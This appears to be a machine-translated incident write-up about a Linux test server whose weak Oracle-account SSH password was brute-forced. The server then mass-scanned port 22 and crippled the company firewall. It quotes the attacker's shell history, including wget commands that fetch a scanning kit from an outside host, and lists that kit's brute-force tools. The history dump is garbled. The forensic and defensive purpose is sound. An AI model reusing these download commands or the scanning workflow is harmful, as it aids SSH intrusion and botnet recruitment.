The whole process of linuxserver in broiler

The whole process of linuxserver in broiler

• The whole process of linuxserver in broiler
  • From the collapse of the firewall.
  • Ways to find the whereabouts of a hacker
  • Analysis of the process of sinking
    • 1 Oracle user password is cracked
    • 2 Hacker Action Deduction
    • 3 Attack tools at a glance
  • Profound lessons

1 from the firewall paralysis.

March 10, 2015, not yet the company was called to tell the office is unable to connect to the Internet, the network is very slow. The Web page cannot be browsed properly. Rush to feel the company and start looking for problems.

The switch failure was first excluded because the internal LAN is normal. When you ping a firewall device, the packet is severely dropped. Obviously, the firewall is out of the question, can't hold it. Its web management interface simply does not log in properly. Immediately contact their service provider remote lookup problem, after nearly 3 hours of analysis, concluded that there are two hosts in the network to send a large number of TCP packets, an instant can cause 400,000 links on the firewall. greatly exceeds the processing power of the firewall, resulting in the inability to respond to normal routing requests. We call these two machines a and Bfor the moment. After disconnecting the two machines. The internet is now normal. The number of links on the firewall is reduced very quickly to normal levels.

Host A configuration such as the following:

• Os-redhat Enterprise Linux Server release 6.3
• Deploy software-tomcat,sshd, Oracle
• Ram-4gb
• Cpu-intel Core i3-2130
• IP address-172.16.35.201 (externally mapped to 59.46.161.39)

Host B is the customer managed host. Detailed configuration is unknown.

This article is only for the analysis and processing of host A .

Through the firewall command-line interface. Catch bag Discovery a machine crazy 22port scan A group of IP addresses. Here is the capture result fragment:

Proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:39895=====>183.58.99.130:22, packet= 3, bytes=208[reply] 183.58.99.130:22=====>59.46.161.39:39895, packet=0, bytes=0proto=6 TCP TCP_NS_ESTABLISHED, Status:00001198,left_time:0s,172.16.35.201:33967=====>183.58.99.131:22, Packet=3, Bytes=208[REPLY] 183.58.99.131:22=====>59.46.161.39:33967, packet=0, bytes=0proto=6 TCP Tcp_ns_established,status:00001198,left_ Time:0s,172.16.35.201:34117=====>183.58.99.132:22, Packet=3, bytes=208[reply] 183.58.99.132:22=====> 59.46.161.39:34117, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left_time:0s, 172.16.35.201:54932=====>183.58.99.125:22, Packet=3, bytes=208[reply] 183.58.99.125:22=====> 59.46.161.39:54932, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left_time:0s, 172.16.35.201:60333=====>183.58.99.135:22, Packet=3, bytes=208[reply] 183.58.99.135:22=====> 59.46.161.39:60333, packet=0, bytes=0proto=6 TCP tcp_ns_establIshed,status:00001198,left_time:0s,172.16.35.201:52737=====>183.58.99.136:22, Packet=3, Bytes=208[REPLY] 183.58.99.136:22=====>59.46.161.39:52737, packet=0, bytes=0proto=6 TCP Tcp_ns_established,status:00001198,left_ Time:0s,172.16.35.201:52291=====>183.58.99.137:22, Packet=3, bytes=208[reply] 183.58.99.137:22=====> 59.46.161.39:52291, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left_time:0s, 172.16.35.201:46183=====>183.58.99.138:22, Packet=3, bytes=208[reply] 183.58.99.138:22=====> 59.46.161.39:46183, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left_time:0s, 172.16.35.201:36864=====>183.58.99.139:22, Packet=3, bytes=208[reply] 183.58.99.139:22=====> 59.46.161.39:36864, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left_time:0s, 172.16.35.201:34515=====>183.58.99.133:22, Packet=3, bytes=208[reply] 183.58.99.133:22=====> 59.46.161.39:34515, packet=0, bytes=0proto=6 TCP Tcp_ns_established,status:00001198,lefT_time:0s,172.16.35.201:57121=====>183.58.99.134:22, Packet=3, bytes=208[reply] 183.58.99.134:22=====> 59.46.161.39:57121, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left_time:0s, 172.16.35.201:37830=====>183.58.99.140:22, Packet=3, bytes=208[reply] 183.58.99.140:22=====> 59.46.161.39:37830, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left_time:0s, 172.16.35.201:42742=====>183.58.99.141:22, Packet=3, bytes=208[reply] 183.58.99.141:22=====> 59.46.161.39:42742, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left_time:0s, 172.16.35.201:55018=====>183.58.99.142:22, Packet=3, bytes=208[reply] 183.58.99.142:22=====> 59.46.161.39:55018, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left_time:0s, 172.16.35.201:46447=====>183.58.99.143:22, Packet=3, bytes=208[reply] 183.58.99.143:22=====> 59.46.161.39:46447, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:51039=====>183.58.99.147:22, Packet=3, bytes=208[reply] 183.58.99.147:22=====>59.46.161.39:51039, packet=0, Bytes=0proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:33123=====>183.58.99.146:22, Packet=3, bytes=208[reply] 183.58.99.146:22=====>59.46.161.39:33123, packet=0, bytes=0proto=6 TCP TCP_NS_ Established,status:00001198,left_time:0s,172.16.35.201:35956=====>183.58.99.151:22, Packet=3, Bytes=208[REPLY ] 183.58.99.151:22=====>59.46.161.39:35956, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left _time:0s,172.16.35.201:45002=====>183.58.99.145:22, Packet=3, bytes=208[reply] 183.58.99.145:22=====> 59.46.161.39:45002, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left_time:0s, 172.16.35.201:54711=====>183.58.99.150:22, Packet=3, bytes=208[reply] 183.58.99.150:22=====> 59.46.161.39:54711, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left_time:0s, 172.16.35.201:58976=====>183.58.99.155:22, Packet=3, bytes=208[reply] 183.58.99.155:22=====>59.46.161.39:58976, packet=0, bytes=0proto=6 TCP TCP_NS_ Established,status:00001198,left_time:0s,172.16.35.201:37967=====>183.58.99.157:22, Packet=3, Bytes=208[REPLY ] 183.58.99.157:22=====>59.46.161.39:37967, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left _time:0s,172.16.35.201:47125=====>183.58.99.158:22, Packet=3, bytes=208[reply] 183.58.99.158:22=====> 59.46.161.39:47125, packet=0, bytes=0proto=6 TCP tcp_ns_established,status:00001198,left_time:0s, 172.16.35.201:35028=====>183.58.99.156:22, Packet=3, bytes=208[reply] 183.58.99.156:22=====> 59.46.161.39:35028, Packet=0, bytes=0

Can clearly see, the Broiler scanning program frantically scan a network segment of 22port.

2 ways to find a hacker's whereabouts

For Linux hosts, the basis for post-failure analysis and processing is primarily logs.

/var/log/messages and/var/log/secure are indispensable analysis targets. Then there is the. bash_history command record.

Hackers log in to the host must leave a record in the log, advanced hackers may be able to delete traces. But for now, most hackers are black-hearted people using off-the-shelf tools, with little technical background.

The host is open to three TCP listening ports:

• sshd
• Tomcat
• 1521 Oracle

All three of these services are vulnerable to attack. The easiest to be scanned by the attack or Sshdusernamepassword was cracked. So the first analysis/var/log/secure log, see login history.

3 analysis of the fall Process 3.1 Oracle User password cracked

Analyze the/var/log/secure log. Do not see a scare to see, the log has occupied four files. Each file records a large number of attempts to log on. Execute command:

cat secure-20150317 | grep ‘Failed password‘ | cut -d " " -f 9,10,11 | sort | uniq

Get
Invalid user admin
Invalid user Dacx
Invalid user Details3
Invalid user Drishti
Invalid user Ferreluque
Invalid user git
Invalid User Hall
Invalid user Jparksu
Invalid user last
Invalid user Patrol
Invalid user Paul
Invalid user pgadmin
Invalid user Postgres
Invalid user public
Invalid user Sauser
Invalid user Siginspect
Invalid user sql
Invalid user support
Invalid user sys
Invalid user sysadmin
Invalid user system
Invalid user Taz
Invalid user test
Invalid user TipTop
Invalid user txl5460
Invalid user ubnt
Invalid user www
MySQL from 10.10.10.1
Oracle from 10.10.10.1
Root from 10.10.10.1
It can be seen that the attacking program is constantly experimenting with different accounts and password.

The following 2 lines are found near the tail, for example, and the description is breached.

Mar  9 20:35:30 localhost sshd[30379]: Accepted password for oracle from 10.10.10.1 port 56906 ssh2Mar  9 20:35:30 localhost sshd[30379]: pam_unix(sshd:session): session opened for user oracle by (uid=0)

Visible account Oracle's password was guessed and successfully logged into the system.

3.2 Hacker Action Deduction

Here's a look at what hackers have done with Oracle accounts. First Copy an Oracle's command history to prevent the loss of the record.

cp /home/oracle/.bash_history hacker_history

Then look at analyzing this file. I'll comment on the hacker's idea in the back.

    1 vi. bash_profile 2 vi. bash_profile (see. bash_profile, see variable settings, add/home/oracle/bin to Path) 3 LL 4 CD/ 5 Vi. bash_profile 6 vi. bash_profile (implementation. environment variable setting) 7 W 8 PS x (view system execution Process) 9 free-m (view memory size) uname-a (View system   Version number) Cat/etc/issue (view system release) Cat/etc/hosts (see if there is an in-network machine) Cat/proc/cpuinfo (view CPU model) 14 Cat. Bash_history (View Oracle Account History Operations) (view system load) ls-a (view/home/oracle /under the hidden file) passwd (changed the password of Oracle account) exit LS + O Racle sqlplus (Execution sqlplus) SU (attempting to switch to the root account) app1123456 (push ROOTP Assword) su-26 W free-m php-v (view PHP version number), Exit 3 0 W free-m php-v PS aux ls-a/exit 3 W PNS free-m8 php-v Cat Bash_his (View history commands)-Cat bash_history, Cat bash_history, wget scriptcoders.ucoz.com/            Piata.tgz (Download Broiler attack package) ZXVF tar piata.tgz (unpack package) Rm-rf piata.tgz (delete package) CD piata/ (Switch to attack software folder) ls-a chmod +x *./a 210.212 (execution attack software), (attempted to execute the screen command, found   No after download it) ls-a wget scriptcoders.ucoz.com/screen.tgz tar zxvf screen.tgz (decompression)./screen piata/(Switch to attack software folder) Ls-a-Cat Vuln.txt (view attack result)-6 x ls-a  1 MV Vuln.txt 1.txt (save attack result)./screen-r Nano 1.txt (view result file) PS x 67 CD Piata-PS x ls-a-Nano 2.txt, Exit-W-PS x-CD piata/75 ls-a Cat 7 7 mv Vuln.txt 2.txt (save result) x Nano 2.txt (W) PS × Bayi CD piata/82 ls-a cat Vuln.txt R M-RF vuln.txt 85./Screen-r-X-Exit, W-PS × piata/90 ls-a, cat Vuln.txt, ls-a, MV Vuln.txt 3.TX T (save result) 94 Nano 3.txt p Exit/W x PS x 98 CD piata/99 ls-a cat Vuln.txt 101 RM-RF V  Uln.txt 102 Exit 103 W 104 PS x CD piata/106 ls-a 107 cat Vuln.txt 108 RM-RF vuln.txt 109 RM-RF  1.txt RM-RF 2.txt 111 rm-rf 2.txt.save rm-rf 3.txt 113 screen-r./screen-r 116   W 117 PS x 118 CD piata/119 ls-a-cat vuln.txt 121 ls-a 122 Nano vuln.txt 123 RM-RF Vuln.txt 124 Screen-r/screen-r 126 Exit 127 w PS x 129 cd piata/130 ls-a 131 cat vuln.txt-Nano Vul  N.txt 133 W 134 ls-a 135 RM-RF vuln.txt 136 screen-r 137./screen-r 138 Exit 139 W PS x 141 CD   piata/142 ls-a 143 Cat Vuln.txt 144 RM-RF vuln.txt 145 ps x 146 ls-a 147./screen-r 148 Exit 149 W PS x 151 CD PIAta/152 ls-a 153 Cat Vuln.txt 154 Nano vuln.txt 155 W 156 rm-rf vuln.txt 157./screen-r 158 Exit 

3.3 Attack tools at a glance

The previous command history is logged. Be able to see that the attack tool package is named Piata.

Download to see how it looks.

[[email protected] piata]# lltotal 1708-rw-r--r--. 1 oracle oinstall      0 Mar 10 13:01 183.63.pscan.22-rwxr-xr-x. 1 oracle oinstall    659 Feb  2  2008 a-rwxr-xr-x. 1 oracle oinstall    216 May 18  2005 auto-rwxr-xr-x. 1 oracle oinstall    283 Nov 25  2004 gen-pass.sh-rwxr-xr-x. 1 oracle oinstall     93 Apr 19  2005 go.sh-rwxr-xr-x. 1 oracle oinstall   3253 Mar  5  2007 mass-rwxr-xr-x. 1 oracle oinstall  12671 May 18  2008 pass_file-rwxr-xr-x. 1 oracle oinstall  21407 Jul 22  2004 pscan2-rwxr-xr-x. 1 oracle oinstall 249980 Feb 13  2001 screen-rw-r--r--. 1 oracle oinstall 130892 Feb  3  2010 screen.tgz-rwxr-xr-x. 1 oracle oinstall 453972 Jul 13  2004 ss-rwxr-xr-x. 1 oracle oinstall 842736 Nov 24  2004 ssh-scan-rw-r--r--. 1 oracle oinstall   2392 Mar 10 05:03 vuln.txt

A, auto, go.sh gen-pass.sh, are bash script files that are used to configure the scan segment. Invokes the scanner. Pscan2 and Ssh-scan are scanning programs. Vuln.txt records the list of chickens obtained.

No other system files have been detected by hackers at this moment. Nor do they proactively execute attack software settings.

4 Deep lessons

Although the attacked machine is only a test host, its own importance is not high, but it caused the firewall paralysis, which caused the Internet can not access the normal. In this regard, it must be given sufficient attention and lessons learnt from it.

• System account password must have a certain degree of complexity.

  This attack was caused by the simplistic password of Oracle account.

• Sshd has a very high risk of logging in password mode . Especially when password is simple. If possible, close the password mode as much as possible and use the public key mode instead.

• As the data Center administrator, must supervise the supervision system administrator and the software developer's service security, this attack host is to put all authority to the site development company, but the development company does not attach importance to the operation security.

The above is the case of host A , host B for our hosted customer host, I do not have administrative authority, is now waiting for their inspection changes report.

The whole process of linuxserver in broiler